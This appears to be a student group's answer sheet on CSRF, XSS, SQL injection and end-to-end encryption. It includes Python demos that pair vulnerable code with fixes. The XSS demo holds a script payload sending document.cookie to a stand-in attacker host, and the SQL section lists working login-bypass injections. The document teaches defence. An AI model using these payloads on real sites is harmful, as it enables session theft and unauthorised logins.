- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? And what is the attacker's intention in using it?
- Consider the SQL command below. Where is the vulnerability? Think about some ways an attacker could misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does End-to-End encryption mean? Share an example of a well-known app using E2EE. How does that app use it?
Room 11: Dana Maraqa, Musab Sakhreyah, Aya Abu Al Hummos, Sanad Al Shobaki
Q1:
Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user's browser to submit a request to a web application that the user is currently authenticated to. CSRF exploits the trust a web application places in an authenticated user: the attacker uses HTTP requests (for example a hidden form, an image tag or a link on a page the attacker controls) to make the victim's browser send a forged request to the target site, and because the browser automatically attaches the victim's session cookie to that request, the server treats it as legitimate.
It is called a one-click attack because it usually takes only one click on a malicious link, or a single visit to a malicious website, for the forged request to be sent.
Q2:
An XSS (Cross-Site Scripting) attack occurs when an attacker injects a malicious script into content served by a trusted website, so that the script executes in the victim's browser with that site's origin. The connection to cookies/sessions is that attackers often use XSS to steal session cookies or tokens: the injected script reads the user's cookies (for example via document.cookie) and sends them to the attacker, who can then hijack the session and impersonate the user.
XSS categories:
Stored (persistent): the malicious script is permanently stored on the target server (for example in a comment or profile field) and is served to every user who views that content.
Reflected (non-persistent): the malicious script is included in a request sent to the server (typically in a URL parameter), and the server echoes it back in the response without encoding it.
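The reflected case described above, as an added example that is not part of the original answer sheet: a search page copies the q parameter into its HTML, an attacker crafts a link carrying a cookie-stealing script, and the fix is output encoding with html.escape. The attacker host attacker.example, the payload and the session cookie value are constructed for the example; the HttpOnly flag shown at the end is a second, independent layer that keeps document.cookie from exposing the session cookie even if some script does run.

```python
import html
from urllib.parse import quote, parse_qs

# Constructed attacker payload (example only): when it executes in the victim's
# browser it sends document.cookie to a hypothetical attacker-controlled host.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def attack_query_string():
    """The query string carried by the link the victim is tricked into clicking."""
    return "q=" + quote(PAYLOAD)


def _query_param(query_string, name="q"):
    return parse_qs(query_string).get(name, [""])[0]


def render_search_vulnerable(query_string):
    """Reflected XSS: the q parameter is copied into the HTML response verbatim,
    so the browser parses the attacker's <script> tag and runs it."""
    return f"<p>Results for: {_query_param(query_string)}</p>"


def render_search_fixed(query_string):
    """Output encoding: html.escape turns <, >, &, ' and " into entities, so the
    browser renders the payload as visible text instead of executing it."""
    return f"<p>Results for: {html.escape(_query_param(query_string), quote=True)}</p>"


def contains_live_script(html_doc):
    """Crude check used only to show the difference: a raw <script> tag survived."""
    return "<script>" in html_doc


def session_cookie_header(session_id):
    """HttpOnly hides the cookie from document.cookie; Secure and SameSite=Lax
    are the usual companions (constructed header for the example)."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    qs = attack_query_string()
    print("vulnerable:", render_search_vulnerable(qs))
    print("fixed:     ", render_search_fixed(qs))
    print(session_cookie_header("abc123"))
```

Run it and compare the two responses: the vulnerable one contains the script tag as live markup, the fixed one contains &lt;script&gt; and is rendered as text. Encoding must match the context the value lands in (HTML body here; attribute, URL and JavaScript contexts need their own encoders).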
Q3:
Q4-
The SQL command is vulnerable to SQL injection because it builds the query by concatenating user-provided data (username and password) directly into the SQL text instead of passing it as parameters. Note that the template does not even quote the values (username=${username}), so whatever the user sends is placed in the query as raw SQL: a username such as 1 OR 1=1 -- turns the query into SELECT Count(*) FROM Users WHERE username=1 OR 1=1 -- AND password=..., the comment marker -- discards the password check, and the count is non-zero for any password. If the values were quoted (username='${username}'), an attacker could instead supply admin' -- as the username, giving SELECT Count(*) FROM Users WHERE username='admin' -- ' AND password='...', which logs in as admin without knowing the password, provided 'admin' is a valid username.
Another classic payload for the quoted form is ' OR '1'='1 in both fields, which yields SELECT Count(*) FROM Users WHERE username='' OR '1'='1' AND password='' OR '1'='1'; the OR '1'='1' term always evaluates to true, so the count is never zero and authentication succeeds without valid credentials. The fix is to use a parameterized (prepared) query, so the database never interprets the input as SQL.
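The injections discussed above, run against a real database, as an added example that is not part of the original answer sheet. The page's snippet is Node-style JavaScript; this version is Python with the standard-library sqlite3 module so it runs offline against a constructed in-memory Users table. It shows the page's unquoted template, the quoted variant the answer assumes, and the parameterized form that defeats both payloads; the table contents and the payload strings are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory Users table (example data, not the page's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_unquoted(conn, username, password):
    """Same shape as the page's template literal: values dropped into the SQL
    text with no quotes and no parameters.  Ordinary input such as admin does
    not even parse (SQLite reads it as a column name), but an attacker can
    supply SQL fragments directly."""
    qry = f"SELECT Count(*) FROM Users WHERE username={username} AND password={password}"
    return conn.execute(qry).fetchone()[0] > 0


def login_quoted(conn, username, password):
    """The variant the answer above assumes, with the values wrapped in single
    quotes.  Works for normal input, but a quote in the input closes the
    literal early and the rest is parsed as SQL."""
    qry = f"SELECT Count(*) FROM Users WHERE username='{username}' AND password='{password}'"
    return conn.execute(qry).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Hardened form: the SQL text is fixed and the values travel as bound
    parameters, so the driver never interprets them as SQL."""
    qry = "SELECT Count(*) FROM Users WHERE username=? AND password=?"
    return conn.execute(qry, (username, password)).fetchone()[0] > 0


def plain_input_errors(conn):
    """True if the unquoted template fails on ordinary credentials, which is
    why real code ends up with the quoted form instead."""
    try:
        login_unquoted(conn, "admin", "s3cret")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    print("unquoted template rejects plain input:", plain_input_errors(conn))
    print("unquoted, username '1 OR 1=1 --':      ", login_unquoted(conn, "1 OR 1=1 --", "x"))
    print("quoted, username \"admin' --\":          ", login_quoted(conn, "admin' --", "x"))
    print("quoted, \"' OR '1'='1\" in both fields:  ",
          login_quoted(conn, "' OR '1'='1", "' OR '1'='1"))
    print("parameterized, same payload:           ", login_parameterized(conn, "admin' --", "x"))
    print("parameterized, real credentials:       ", login_parameterized(conn, "admin", "s3cret"))
```

The comparison to keep in mind: both vulnerable functions return True for inputs that match no row, while the parameterized one returns True only for admin/s3cret, because the placeholder binding sends admin' -- to the database as a literal value rather than as query text. The same placeholder mechanism exists in the Node drivers (for example ? in mysql2 or $1 in pg).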
Q5-
End-to-End Encryption (E2EE) is a method of secure communication in which data is encrypted on the sender's device and can only be decrypted on the recipient's device, so no third party, including the service provider relaying the messages, can read it while it travels from one end system to the other. A well-known app that uses E2EE is WhatsApp, which implements it with the Signal Protocol. When you send a message, it is encrypted with a key that only the recipient's device holds, so only the recipient can unlock and read it; WhatsApp's servers forward ciphertext they cannot decrypt.